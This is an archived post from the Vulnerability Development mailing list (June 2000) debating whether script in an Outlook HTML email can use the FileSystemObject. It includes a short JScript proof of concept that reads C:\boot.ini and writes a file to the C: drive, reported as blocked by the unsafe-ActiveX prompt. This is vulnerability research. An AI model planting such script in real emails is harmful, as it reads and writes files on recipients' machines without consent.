Vulnerability Development mailing list archives

Re: Outlook/HTML "proggie"


From: mrousseau () LABCAL COM (Maxime Rousseau)
Date: Thu, 1 Jun 2000 11:07:52 -0400


I have tested this a little bit here and I have not been able to use the
FSO within an HTML message, unless the user explicitly clicks YES at the
prompt for unsafe ActiveX or has his security set to allow unsafe
ActiveX in HTML emails. That's not so by default, and if your 'CAN'
involves the user clicking the YES box, then it's not all that great; you
might as well have a VBScript file attached.

My point was (and still is) you can't use an FSO in an HTML eMail in a
transparent-to-user manner, sorry if I was unclear.

I used the following code in the HTML message and couldn't get it to run
transparently:

<script>
 // JScript embedded in the HTML mail body; requires the Windows Script
 // Host and an "unsafe ActiveX" answer of YES before Outlook will run it.
 var fso, bFile, nFile;
 fso = new ActiveXObject("Scripting.FileSystemObject");
 // Open C:\boot.ini for reading (mode 1 = ForReading, create = false)
 // and echo its contents into the rendered message.
 bFile = fso.OpenTextFile("C:\\boot.ini",1,0);
 document.write(bFile.ReadAll());
 // Create a new text file in the root of C: to prove write access.
 nFile = fso.GetFolder("C:\\").CreateTextFile("spoitdemo.txt");
 nFile.Write("Hello, This text file was written by an eMail, it could very well have been a virus!");
 nFile.Close();
 bFile.Close();
</script>

If you are able to do it, then by all means please send a sample!
If you get the "unsafe ActiveX" box, then never mind, this isn't very
useful.

M.

PS: Does anyone have details on what was used in the Herald's "hell virus"
story? As in, what objects?

!  -----Original Message-----
!  From: VULN-DEV ( Shelagh Pepper )
!  Sent: Thursday, June 01, 2000 9:00 AM
!  To: VULN-DEV () SECURITYFOCUS COM
!  Subject: Re: Outlook/HTML "proggie"
!
!  A script within the body of an email CAN access the FileSystemObject
!  if the Scripting host is available. I will send a sample separately.
!  Most of the code in my sample is directly lifted from the Microsoft
!  Scripting samples on their website.
!
!  Shelagh

